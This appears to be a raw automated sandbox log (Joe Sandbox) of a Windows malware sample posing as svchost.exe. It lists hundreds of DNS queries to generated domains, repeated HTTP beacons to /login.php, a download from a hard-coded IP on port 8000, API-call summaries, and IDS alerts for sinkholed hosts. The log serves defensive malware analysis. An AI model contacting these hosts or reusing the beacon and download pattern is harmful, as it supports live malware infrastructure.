Source: unknownDNS traffic detected: query: lyvyvix.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lygyfex.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puzydal.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ganyfes.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lysyjid.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vofyzym.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qekyqop.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyvysur.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gadydas.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puvyxeq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lysyfin.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: volycik.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vonykuk.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyxylux.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vojydam.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pufybop.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vonyrot.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puzywuq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyrysyj.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qetyxiq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lygytyd.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qeqyvig.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vopybok.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qedyleq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: volybec.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vocybam.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pumydoq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ganyvoz.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gahyfyz.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: volyjok.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gaqydus.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gaqyreh.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puvyjyl.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qeqyxyp.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qeqyloq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lymysan.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vofydut.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qetyxeg.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lygyxun.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vojymet.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vofybic.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gahydoh.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vocyjet.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyryvur.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pufylap.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qekyfeg.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gadykos.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puvylyg.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qekytyq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ganyzub.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puvypul.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lykyfen.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puvycip.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pumygyp.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyxytex.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vofyref.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qebykap.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gaqydeb.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyxysun.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qexyryl.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qegynuv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: purylev.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lykylan.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vonyzac.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lymygyx.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vowyzam.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vopypec.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vocyquc.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qekynuq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gatyrez.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vopypif.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vonyket.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pufygav.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ganypeb.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puzymev.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gahyvew.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pujylog.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyxyvoj.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gatypub.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lygygin.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gatykow.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qeqyreq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lykywid.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: volyjym.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lygynox.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qedynul.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qebylug.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vopyzuc.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vowyqoc.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vowycut.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qexynyp.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vocykem.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vojygut.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qedyqup.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: galyheh.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gatypas.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pujybyq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyxymin.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puzyguv.com replaycode: Name error (3)
Source: unknown Network traffic detected: HTTP traffic on port 56923 -> 8000
Source: unknown Network traffic detected: HTTP traffic on port 8000 -> 56923
Source: unknown Network traffic detected: DNS query count 1002
Source: C:\Windows\apppatch\svchost.exe Code function: 2_2_02654F80 IsUserAnAdmin,IsNetworkAlive,IsUserAnAdmin,DnsFlushResolverCache,CreateThread,memset,lstrcpynA,lstrcpynA,StrNCatA,StrNCatA,InternetCheckConnectionA,InternetCheckConnectionA,memset,lstrcpynA,StrNCatA,InternetCheckConnectionA,2_2_02654F80
Source: global traffic TCP traffic: 192.168.2.9:56923 -> 106.15.232.163:8000
Source: global traffic DNS traffic detected: number of DNS queries: 1002
Source: Joe Sandbox View IP Address: 3.94.10.34
Source: Joe Sandbox View IP Address: 64.190.63.136
Source: Joe Sandbox View ASN Name: AMAZON-AESUS
Source: Joe Sandbox View ASN Name: CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network traffic Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.208.156.248:80 -> 192.168.2.9:56913
Source: Network traffic Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.208.156.248:80 -> 192.168.2.9:56913
Source: Network traffic Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 44.221.84.105:80 -> 192.168.2.9:56870
Source: Network traffic Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 44.221.84.105:80 -> 192.168.2.9:56870
Source: Network traffic Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 3.94.10.34:80 -> 192.168.2.9:56860
Source: Network traffic Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 3.94.10.34:80 -> 192.168.2.9:56860
Source: Network traffic Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 52.34.198.229:80 -> 192.168.2.9:55973
Source: Network traffic Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 52.34.198.229:80 -> 192.168.2.9:55973
Source: Network traffic Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 52.149.20.212:443 -> 192.168.2.9:62630
Source: Network traffic Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 52.149.20.212:443 -> 192.168.2.9:49270
Source: global traffic HTTP traffic detected: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: puzylyp.com Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /dh/147287063_134827.html HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: 106.15.232.163:8000Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qexyhuv.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galynuh.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyxynyx.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyciz.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyval.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vofycot.com
Source: global trafficHTTP traffic detected: GET /login.php?sub1=20241112-0407-4817-b30f-e9d3a3931519 HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: ww16.vofycot.comConnection: Keep-AliveCookie: __tad=1731344868.1504633
Source: global trafficHTTP traffic detected: GET /login.php?subid1=20241112-0407-4879-ab0a-fce34aca034a HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: ww25.lyxynyx.comConnection: Keep-AliveCookie: __tad=1731344868.1489616
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qetyhyg.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyhub.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lygyvuj.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyhiz.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vojyqem.comCookie: parking_session=a5a88ea0-36a7-4e4e-8f60-5d1139b1df65
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyxynyx.comCookie: __tad=1731344868.1489616
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vofycot.comCookie: __tad=1731344868.1504633
Source: global trafficHTTP traffic detected: GET /login.php?subid1=20241112-0408-095b-a6b9-e37a1a5effa6 HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: ww25.lyxynyx.comConnection: Keep-AliveCookie: __tad=1731344868.1489616; parking_session=07951af7-1a60-440f-a856-c66b7de487f9
Source: global trafficHTTP traffic detected: GET /login.php?sub1=20241112-0408-09d4-8f1c-1de8890559b5 HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: ww16.vofycot.comConnection: Keep-AliveCookie: __tad=1731344868.1504633
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galyqaz.comCookie: vsid=910vr4788904590031611
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qetyfuv.comCookie: snkz=66.23.206.109; btst=1885748a88d570f6bc1d4997b747b719|66.23.206.109|1731344858|1731344858|0|1|0
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lymyxid.comCookie: snkz=66.23.206.109; btst=efdffc983bdd66cc7891294af6cfad3b|66.23.206.109|1731344858|1731344858|0|1|0
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vonypom.comCookie: snkz=66.23.206.109; btst=d26b1bc4b9544e9356db55f438dfb4a0|66.23.206.109|1731344858|1731344858|0|1|0
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vocyzit.comCookie: snkz=66.23.206.109; btst=dfd3f50e4dee78c8f9b2b106904110df|66.23.206.109|1731344858|1731344858|0|1|0
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qetyfuv.comCookie: snkz=66.23.206.109; btst=1885748a88d570f6bc1d4997b747b719|66.23.206.109|1731344905|1731344858|23|2|0
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lymyxid.comCookie: snkz=66.23.206.109; btst=efdffc983bdd66cc7891294af6cfad3b|66.23.206.109|1731344906|1731344858|24|2|0
Source: unknownTCP traffic detected without corresponding DNS query: 106.15.232.163
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Windows\apppatch\svchost.exe
Code function: 2_2_02654AB0 memset,GetProcessHeap,HeapAlloc,memset,memcpy,InternetOpenA,InternetConnectA,HttpOpenRequestA,HttpAddRequestHeadersA,HttpAddRequestHeadersA,HttpAddRequestHeadersA,_snprintf,HttpAddRequestHeadersA,HttpSendRequestA,HttpQueryInfoA,CreateFileA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,GetProcessHeap,GetProcessHeap,RtlAllocateHeap,memset,InternetReadFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetHandleInformation,CloseHandle,GetProcessHeap,HeapValidate,GetProcessHeap,RtlFreeHeap,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,2_2_02654AB0
Source: global traffic
HTTP traffic detected: GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: puzylyp.com
Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lymyxid.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyqah.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vonypom.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qetyfuv.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vocyzit.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galyqaz.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vojyqem.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyqah.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.com
